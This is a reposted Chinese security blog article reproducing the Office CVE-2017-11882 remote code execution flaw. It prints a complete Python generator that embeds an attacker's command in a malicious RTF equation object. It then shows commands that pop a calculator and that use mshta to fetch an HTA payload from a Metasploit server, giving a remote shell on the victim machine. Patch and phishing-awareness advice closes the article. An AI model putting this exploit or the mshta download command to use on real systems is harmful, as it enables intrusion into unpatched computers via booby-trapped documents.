碼上歡樂
相關內容    簡體    繁體

Office--CVE-2017-11882【遠程代碼執行】

本文轉載自   查看原文   2017-11-24 11:17   1274    Office-CVE-2017-11882 遠程代碼執行

Office遠程代碼執行漏洞現POC樣本

最近這段時間CVE-2017-11882挺火的。關於這個漏洞可以看看這里:https://www.77169.com/html/186186.html

今天在twitter上看到有人共享了一個POC,https://twitter.com/gossithedog/status/932694287480913920,http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/,后來又看到有人共享了一個項目https://github.com/embedi/CVE-2017-11882,簡單看了一下這個項目,通過對rtf文件的修改來實現命令執行的目的,最新 Office 的 CVE-2017-11882,完美無彈窗,無視宏,影響 office 全版本。利用觸發器 WebClient 服務從攻擊者控制的 WebDav 服務器啟動和執行遠程文件。該腳本使用多個 OLE 對象創建簡單的文檔。這些對象利用 CVE-2017-11882,從而導致連續命令執行。,具體項目地址如下:

POC地址:https://github.com/Ridter/CVE-2017-11882/

POC源碼如下:

  1 import argparse
  2 import sys 3 4 5 RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} 6 {\*\generator Riched20 6.3.9600}\viewkind4\uc1 7 \pard\sa200\sl276\slmult1\f0\fs22\lang9""" 8 9 10 RTF_TRAILER = R"""\par} 11 """ 12 13 14 OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ 15 16 17 OBJECT_TRAILER = R""" 18 }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}} 19 {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}} 20 {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}} 21 {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0 22 \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02 23 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}} 24 """ 25 26 27 OBJDATA_TEMPLATE = R""" 28 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 29 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 30 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff 31 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 32 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 33 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 34 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 35 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 36 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 37 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 38 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 39 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 40 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 41 fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe 42 fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 43 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 44 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 45 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 46 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 47 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 48 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 49 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 50 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 51 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 52 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 53 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 54 ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000 55 00000000000000000000000000000000000000000000000000000000000000000000000000000000 56 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 57 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 58 00000000000000000000000000000000000000000000000000000000000000000000000000000000 59 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 60 0000000000000000000000000000000000000000000000000000001400000000000000010043006f 61 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000 62 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000 63 00000000000000000000000000000000000000000000000000000000000000010000006600000000 64 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000 65 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff 66 ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 67 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe 68 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 69 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 70 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 71 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 72 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 73 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 74 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 75 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 76 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 77 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 78 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 79 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 80 ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 81 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 82 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 83 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 84 00000000000000000000000000000000000000000000000000000000000000000000000000030004 85 00000000000000000000000000000000000000000000000000000000000000000000000000000000 86 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4 87 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 88 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 89 00000000000000000000000000000000000000000000000000000000000000000000000000000000 90 00000000000000000000000000000000000000000000000000000000000000000000000000000000 91 00000000000000000000000000000000000000000000000000000000000000000000000000000000 92 00000000000000000000000000000000000000000000000000000000000000000000004500710075 93 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 94 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 95 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 96 00000000000000000000000000000000000000000000000000000000000000000000000000000000 97 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff 98 ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 99 00000000000000000000000000000000000000000000000000000000000000000000000000000000 100 000000000000000000000000000000000000000000000000000000000000000000000000000000ff 101 ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 102 00000000000000000000000000000000000000000000000000000000000000000000000000000000 103 00000000000000000000000000000000000000000000000000000000000000000000000000000000 104 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 105 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 106 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500 107 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00 108 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00 109 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468 110 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65 111 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001 112 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131 113 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131 114 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000 115 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff 116 7cef1800040000002d01010004000000f0010000030000000000 117 """ 118 119 120 COMMAND_OFFSET = 0x949*2 121 122 123 def create_ole_exec_primitive(command): 124 if len(command) > 43: 125 print "[!] Primitive command must be shorter than 43 bytes" 126  sys.exit(0) 127 hex_command = command.encode("hex") 128 objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n") 129 ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):] 130 return OBJECT_HEADER + ole_data + OBJECT_TRAILER 131 132 133 134 def create_rtf(header,command,trailer): 135 ole1 = create_ole_exec_primitive(command + " &") 136 137 # We need 2 or more commands for executing remote file from WebDAV 138 # because WebClient service start may take some time 139 return header + ole1 + trailer 140 141 142 143 if __name__ == '__main__': 144 parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882") 145 parser.add_argument("-c", "--command", help="Command to execute.", required=True) 146 parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) 147 148 args = parser.parse_args() 149 150 rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER) 151 152 output_file = open(args.output, "w") 153  output_file.write(rtf_content) 154 155 print "[*] Done ! output file --> " + args.output

復現過程:

使用方式很簡單,要通過執行命令來生成漏洞 doc 文件,首先簡單的測試一下是否能夠彈出計算器,命令如下:

python python.py -c "cmd.exe /c calc.exe" -o 1.doc,則:

那么相應地生成了1.doc文件:當我打開1.doc的時候 會提示如下信息:

點擊允許之后:

 

就會自動調用計算器,既然能夠實現彈出,那我們可以構造執行 powershell 直接獲取 msf 會話。

深入利用

在利用前,先了解一下 hta,hta 文件使用 HTML 格式,它的程序碼可以像 HTML 一樣被編輯和檢查。在 hta 文件中 VBScript 和 JavaScript 的程序碼可以任意混合。HTA 雖然用 HTML、JS 和 CSS 編寫,卻比普通網頁權限大得多。它具有桌面程序的所有權限(讀寫文件、操作注冊表等)。hta 本來就是被設計為桌面程序的。

在復現過程中,察覺到是使用 hta 進行命令執行利用,推測攻擊機作為 hta_server,然后嘗試在 msf 搜索 hta,發現一個模塊的實現效果跟 PS_shell 一樣,接下來開始演示一下:

1、在 msf 搜索 hta_server 模塊,然后 use,設置好相關參數,exploit -j:

2、攻擊機用腳本生成doc文件:

python python.py -c "mshta http://192.168.1.115:8080/test"-o test2.doc

3、用測試機打開 doc 文件,測試機正常上線:

 

攻擊成功,到此為止,這個模塊的實驗成功返回 shell。然后換成了 win7 + office2007 環境,也成功 getshell。

由於辦公文檔是常用的,人們在查看 doc 等文檔文件時不會過多注意。但當 Office 辦公軟件存在漏洞時,就會成為黑客的工具。

防御方法:

目前微軟公司已經發布了安全補丁下載微軟對此漏洞補丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

大家可以安裝補丁修復該漏洞並開啟自動更新功能,另外大部分殺軟已經采取了防御措施,經測試部分殺軟直接把 mshta、rundll32、powershell 執行的命令都會做相關攔截,並提示給用戶這是可疑操作。

這個漏洞 APT 領域可謂神洞,利用起來如此方便,對於用戶來說,要做的不僅僅是要及時更新補丁、安裝殺毒軟件,還要提升自己的安全意識,知道這個漏洞在實際場景中是如何被運用的,可以針對性的應對。這種漏洞在 APT 領域通常會結合社會工程學的技術來運用,常用的社會工程學技巧包括:發送釣魚郵件(附件類型)、通過聊天軟件(獲取你的新人誘使你打開文檔)、在你經常光顧的網站上上傳惡意文檔等。在自己的系統沒有更新到最新的補丁或者沒有安裝殺毒軟件的情況下對於別人發來的文檔盡量不要打開,一旦運行,對於個人是個人電腦被人入侵,如果在企業,那么你所在的企業安全就岌岌可危了。

本次技術分享僅供個人測試驗證及學習,請勿用於任何非法用途,謝謝!

防御方法:

目前微軟公司已經發布了安全補丁下載微軟對此漏洞補丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

大家可以安裝補丁修復該漏洞並開啟自動更新功能,另外大部分殺軟已經采取了防御措施,經測試部分殺軟直接把 mshta、rundll32、powershell 執行的命令都會做相關攔截,並提示給用戶這是可疑操作。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 漏洞復現-Office遠程代碼執行漏洞 (CVE-2017-11882&CVE-2018-0802) 【漏洞復現】Office遠程代碼執行漏洞(CVE-2017-11882) 隱藏17年的Office遠程代碼執行漏洞(CVE-2017-11882) Office遠程代碼執行漏洞CVE-2017-0199復現 [漏洞復現] CVE-2017-11882 通殺所有Office版本 Office隱藏17年的漏洞CVE_2017_11882測試記錄 漏洞復現-CVE-2017-7525-Jackson遠程代碼執行 Tomcat遠程代碼執行漏洞CVE-2017-12615復現 Tomcat遠程代碼執行漏洞(CVE-2017-12615)修復 Jenkins遠程代碼執行漏洞檢查(CVE-2017-1000353)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM